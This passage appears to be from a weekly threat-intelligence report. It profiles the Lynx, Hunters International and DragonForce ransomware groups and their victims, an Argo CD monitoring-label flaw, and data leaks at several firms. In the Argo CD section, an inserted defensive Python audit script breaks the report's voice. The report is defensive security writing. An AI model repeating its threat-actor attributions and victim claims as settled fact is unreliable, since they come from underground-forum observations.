  • Lynx operates a well-organized affiliate panel that allows affiliates to manage victim profiles, generate custom ransomware samples, and schedule data leaks. Affiliates receive 80% of the ransom proceeds and handle negotiations, maintaining control over the ransom wallet. The platform includes features like a call center to harass victims and advanced storage solutions for high-performing affiliates.
  • Lynx employs double extortion methods by encrypting victims’ data and threatening to leak sensitive information if ransoms are not paid. They maintain a dedicated leak site where they publish announcements about attacks and disclose stolen data.
  • The Lynx Ransomware group primarily targets countries, such as the United States of America, the United Kingdom, Italy, Thailand, and Australia.
  • The Lynx Ransomware group primarily targets industries, including Retail, Heavy Construction, Specialized Consumer Services, Business Support Services, and Oil & Gas.
  • Based on the Lynx Ransomware victims list from 1st June 2024 to 29th Jan 2025, the top 5 Target Countries are as follows:
  • The Top 10 Industries, most affected by Lynx Ransomware from 1st June 2024 to 29th Jan 2025 are as follows:

ETLM Assessment:
According to CYFIRMA’s assessment, Lynx Ransomware represents a significant threat in the evolving landscape of cybercrime. Its sophisticated techniques and aggressive tactics necessitate robust cybersecurity measures from organizations to mitigate risks associated with ransomware attacks. As this group continues to operate, ongoing monitoring and analysis will be crucial for understanding their methods and developing effective defenses against them.

The Hunters International Ransomware Impacts PetroVietnam Exploration Production Corporation

  • Attack Type: Ransomware
  • Target Industry: Energy
  • Target Geography: Vietnam
  • Ransomware: Hunters International Ransomware
  • Objective: Data Theft, Data Encryption, Financial Gains
  • Business Impact: Financial Loss, Data Loss, Reputational Damage

Summary:
From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in an underground forum that a company from Vietnam, PetroVietnam Exploration Production Corporation (www[.]pvep[.]com[.]vn), was compromised by Hunters International Ransomware. PetroVietnam Exploration Production Corporation (PVEP) is the upstream subsidiary of the Vietnam Oil and Gas Group (PetroVietnam), responsible for oil and gas exploration and production activities both domestically and internationally. The compromised data includes confidential and sensitive information belonging to the organization. The scale of the data exposure measures approximately 1.3 TB, comprising a total of 243,580 discrete files.

Source: Dark Web

Relevancy & Insights:

  • Hunters International is a ransomware group that has gained significant attention since its emergence in October 2023. The group operates under a ransomware-as-a-service (RaaS) model and is known for its aggressive tactics, particularly focusing on data exfiltration alongside file encryption.
  • Recently, we observed that Hunters International exploited vulnerabilities in Oracle WebLogic servers (CVE-2025-21535, CVSS score 9.8) to gain initial access to victim networks. This technique has been a common entry point for the group, allowing them to conduct reconnaissance and lateral movement before executing ransomware attacks.
  • Hunters International operates as a RaaS provider, allowing affiliates to use their infrastructure for attacks. This model has enabled them to expand their reach and impact significantly.
  • The Hunters International Ransomware group primarily targets countries, such as the United States of America, the United Kingdom, Canada, Spain, and India.
  • The Hunters International Ransomware group primarily targets industries, including Heavy Construction, Business Support Services, Government Agencies, Telecommunications, and Health Care Providers.
  • Based on the Hunters International Ransomware victims list from 1st Jan 2024 to 29th Jan 2025, the top 5 Target Countries are as follows:
  • The Top 10 Industries, most affected by Hunters International Ransomware from 1st Jan 2024 to 29th Jan 2025 are as follows:

ETLM Assessment:
According to CYFIRMA’s assessment, Hunters International ransomware represents a significant threat within the ransomware landscape due to its sophisticated tactics and focus on double extortion strategies. Organizations are advised to enhance their cybersecurity measures by implementing robust backup solutions, conducting regular employee training on phishing awareness, and maintaining updated security protocols to mitigate risks associated with this evolving threat actor. Continuous monitoring of Hunters International’s activities will be essential for understanding its impact on global cybersecurity efforts.

5. Vulnerabilities and Exploits

Vulnerability in ArgoCD

  • Attack Type: Vulnerabilities & Exploits
  • Target Technology: Kubernetes Controller
  • Vulnerability: CVE-2024-13484
  • CVSS Base Score: 8.2
  • Vulnerability Type: Exposure of Resource to Wrong Sphere
  • Summary: A flaw was found in ArgoCD.

Relevancy & Insights: The openshift.io/cluster-monitoring label is applied to all namespaces that deploy an ArgoCD CR instance, allowing the namespace to create a rogue PrometheusRule.

Impact: This issue can have adverse effects on the platform monitoring stack, as the rule is rolled out cluster-wide when the label is applied.

Affected Products: https[:]//access[.]redhat[.]com/security/cve/CVE-2024-13484

Recommendations:
Monitoring and Detection: Implement monitoring and detection mechanisms to identify unusual system behavior that might indicate an attempted exploitation of this vulnerability.
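One concrete check a defender can run for the condition described above, added here as example code that is not part of the report or of the Argo CD project: it parses the JSON that `kubectl get namespaces -o json` and `kubectl get prometheusrules -A -o json` produce and lists, for every namespace carrying the openshift.io/cluster-monitoring label, the PrometheusRule objects that the platform monitoring stack would pick up cluster-wide. The namespace and rule names in the sample data are constructed.

```python
import json

# Label named in the advisory: a namespace carrying it is scraped by the
# platform monitoring stack, so any PrometheusRule created there is rolled
# out cluster-wide.
CLUSTER_MONITORING_LABEL = "openshift.io/cluster-monitoring"


def audit_cluster_monitoring_rules(namespaces_json: str, rules_json: str) -> dict:
    """Map each namespace that carries the cluster-monitoring label to the
    names of the PrometheusRule objects found in it.

    Both inputs are standard Kubernetes List objects (an "items" array), as
    returned by `kubectl get namespaces -o json` and
    `kubectl get prometheusrules -A -o json`.
    """
    namespaces = json.loads(namespaces_json)["items"]
    rules = json.loads(rules_json)["items"]

    # Presence of the label is what matters for the audit, whatever its value.
    labelled = {
        ns["metadata"]["name"]
        for ns in namespaces
        if CLUSTER_MONITORING_LABEL in ns["metadata"].get("labels", {})
    }
    findings = {name: [] for name in sorted(labelled)}
    for rule in rules:
        meta = rule["metadata"]
        if meta["namespace"] in findings:
            findings[meta["namespace"]].append(meta["name"])
    return findings


# Constructed sample output (not captured from a real cluster): two namespaces
# carry the label; one of them holds a PrometheusRule that needs review.
SAMPLE_NAMESPACES = json.dumps({"apiVersion": "v1", "kind": "List", "items": [
    {"metadata": {"name": "platform-monitoring",
                  "labels": {CLUSTER_MONITORING_LABEL: "true"}}},
    {"metadata": {"name": "team-a-argocd",
                  "labels": {CLUSTER_MONITORING_LABEL: "true"}}},
    {"metadata": {"name": "team-b", "labels": {}}},
]})
SAMPLE_RULES = json.dumps({"apiVersion": "v1", "kind": "List", "items": [
    {"metadata": {"name": "unexpected-rule", "namespace": "team-a-argocd"}},
    {"metadata": {"name": "app-alerts", "namespace": "team-b"}},
]})

if __name__ == "__main__":
    for ns, names in audit_cluster_monitoring_rules(SAMPLE_NAMESPACES, SAMPLE_RULES).items():
        print(f"{ns}: {names or 'no PrometheusRule objects'}")
```

Any PrometheusRule listed under a namespace that is not the platform's own monitoring namespace is a candidate for review against the fix referenced in the Affected Products link.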

TOP 5 AFFECTED TECHNOLOGIES OF THE WEEK

This week, CYFIRMA researchers have observed significant impacts on various technologies, due to a range of vulnerabilities. The following are the top 5 most affected technologies.

ETLM Assessment
Vulnerability in Argo CD can pose significant threats to user privacy and security. This can impact various industries globally, including technology, finance, healthcare, and beyond. Ensuring the security of Argo CD is crucial for maintaining the integrity and protection of users’ data worldwide. Therefore, addressing these vulnerabilities is essential to safeguarding declarative continuous delivery processes for Kubernetes, whether used as a standalone tool or as part of a CI/CD workflow, across different geographic regions and sectors.

6. Latest Cyber – Attacks, Incidents, and Breaches

DragonForce Ransomware attacked and published the data of PT PINS Indonesia

  • Threat Actor: DragonForce Ransomware
  • Attack Type: Ransomware
  • Objective: Data Leak, Financial Gains
  • Target Technology: Web Applications
  • Target Industry: Telecommunications, Information Technology
  • Target Geography: Indonesia
  • Business Impact: Operational Disruption, Data Loss, Financial Loss, Potential Reputational Damage

Summary:
Recently, we observed that DragonForce Ransomware attacked and published the data of PT PINS Indonesia (www[.]pins[.]co[.]id) on its dark web website. PT PINS Indonesia is a subsidiary of PT Telkom Indonesia Tbk, focusing on the integration of devices and networks within the telecommunications and information technology sectors. The company offers a range of services, including Managed Mobility Services, Managed Machine-to-Machine (M2M) Solution Services, and Managed Customer Premises Equipment (CPE) Services. The ransomware attack resulted in a data leak containing confidential and sensitive organizational information. The total size of compromised data is approximately 362.14 GB.

Source: Dark Web

Relevancy & Insights:

  • The DragonForce Ransomware group operates as a RaaS, allowing affiliates to customize and deploy their ransomware tools for specific attacks.
  • DragonForce Ransomware uses a double extortion strategy, which involves encrypting data on the victim’s servers and exfiltrating sensitive information. They threaten to leak this data if the ransom is not paid, increasing pressure on victims.
  • DragonForce Ransomware has targeted a variety of sectors, including manufacturing, healthcare, telecommunications, and government entities.

ETLM Assessment:
According to CYFIRMA’s assessment, DragonForce represents a significant threat in the ransomware landscape due to its advanced operational methods and extensive use of modified ransomware tools. As it continues to target high-profile organizations globally, ongoing vigilance and proactive cybersecurity strategies will be essential for mitigating risks associated with this formidable threat actor.
Organizations should remain alert to the evolving tactics employed by groups like DragonForce to protect their sensitive data and maintain operational integrity.

7. Data Leaks

Thrill Bicycle Data Advertised on a Leak Site

  • Attack Type: Data Leak
  • Target Industry: Manufacturing
  • Target Geography: Indonesia
  • Objective: Financial Gains
  • Business Impact: Data Loss, Reputational Damage

Summary:
The CYFIRMA Research team observed a data leak related to Thrill Bicycle (https://www[.]thrillbicycle[.]com) in an underground forum. Thrill Bicycle is a company specializing in the design and manufacture of bicycles tailored to the geometry of Asian riders. The leaked data includes ID, HP (phone number), name, code, city, address, telephone, province, and status. The breach has been linked to a threat actor identified as “AldzzXploit.”

Source: Underground forums

AsiaRecruit Malaysia Data Advertised on a Leak Site

  • Attack Type: Data Leak
  • Target Industry: Recruitment and Human Resources (HR)
  • Target Geography: Malaysia
  • Objective: Data Theft, Financial Gains
  • Business Impact: Data Loss, Reputational Damage

Summary:
The CYFIRMA Research team observed a data leak related to AsiaRecruit Malaysia (https[:]//www[.]asiarecruit[.]com[.]my) in an underground forum. Asia Recruit Malaysia is a premier recruitment agency with an expanding footprint across Asia. Serving a diverse range of industries, including Manufacturing, FMCG, Banking & Finance, IT, Oil & Gas, and Telecommunications, the agency has successfully placed countless professionals in roles across various sectors. The compromised user data includes email addresses, recruitment details, and other information. A total of 88,000 user emails have been leaked. The breach has been attributed to a threat actor known as “IntelBroker.”

Source: Underground forums

Relevancy & Insights:
Financially motivated cybercriminals are continuously scouring for exposed and vulnerable systems and applications to exploit. A significant number of these malicious actors congregate within underground forums, where they discuss cybercrime and trade stolen digital assets. Operating discreetly, these opportunistic attackers target unpatched systems or vulnerabilities in applications to illicitly gain access and steal valuable data.

Subsequently, the pilfered data is advertised for sale within underground markets, where it can be acquired, repurposed, and utilized by other malicious actors in further illicit activities.

ETLM Assessment:
“IntelBroker” represents a significant threat within the cybersecurity landscape due to its sophisticated tactics and high-profile targets. Organizations are advised to implement robust security measures such as access control, regular patch management, and employee training to mitigate risks associated with such threat actors. Continuous monitoring of emerging threats like IntelBroker will be essential for effective incident response strategies in the evolving cyber threat environment.

Recommendations: Enhance the cybersecurity posture by:

  1. Update all software products to their latest versions to mitigate the risk of vulnerabilities being exploited.
  2. Ensure proper database configuration to mitigate the risk of database-related attacks.
  3. Establish robust password management policies, incorporating multi-factor authentication and role-based access to fortify credential security and prevent unauthorized access.

8. Other Observations

The CYFIRMA Research team observed a data leak related to Wattpad (https[:]//www[.]wattpad[.]com/) in an underground forum. Wattpad is an online platform and community that enables users to read and publish original stories across various genres, including romance, teen fiction, and fan fiction. Wattpad has grown into a global hub for writers and readers. The platform boasts over 90 million monthly users and hosts more than 665 million story uploads. The compromised data includes the username, hashbcrypt, email, IP address, and country, along with, for some records, additional details such as city or display name. The breach has been attributed to a threat actor known as “CountySorter.”

Source: Underground Forums

The CYFIRMA Research team observed a data leak related to Tidtangstudio (https[:]//www[.]tidtangstudio[.]com/) in an underground forum. TIDTANG STUDIO is an architecture firm based in Bangkok, Thailand. They specialize in architectural and interior design, with a particular focus on the renovation of heritage buildings into hospitality spaces, such as hostels and hotels. The compromised data includes the ID, author, author email, author URL, IP address, date, amount, content, and other sensitive and confidential information. The breach has been attributed to a threat actor known as “Varun”.

Source: Underground Forums

STRATEGIC RECOMMENDATIONS

  • Attack Surface Management should be adopted by organisations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, and active network monitoring, through next-generation security solutions and a ready-to-go incident response plan.
  • Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.

MANAGEMENT RECOMMENDATIONS

  • Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
  • Proactively monitor the effectiveness of the risk-based information security strategy, the security controls applied, and the proper implementation of security technologies, followed by corrective actions, remediations, and lessons learned.
  • Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcomings of EDR and SIEM solutions.
  • Test detection processes to ensure awareness of anomalous events, communicate anomalies in a timely manner, and continuously evolve these processes to keep up with refined ransomware threats.

TACTICAL RECOMMENDATIONS

  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
  • Consider using security automation to speed up threat detection, improve incident response, increase the visibility of security metrics, and rapidly execute security checklists.
  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defences based on the tactical intelligence provided.
  • Deploy detection technologies that are behavioral anomaly-based to detect ransomware attacks and help to take appropriate measures.
  • Implement a combination of security controls such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), device fingerprinting, IP blacklisting, rate limiting, and account lockout to thwart automated brute-force attacks.
  • Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.

Situational Awareness – Cyber News

Please find the Geography-Wise and Industry-Wise breakup of cyber news for the last 5 days as part of the situational awareness pillar.

Geography-Wise Graph

Industry-Wise Graph

For situational awareness intelligence and specific insights mapped to your organisation’s geography, industry, and technology, please access DeCYFIR.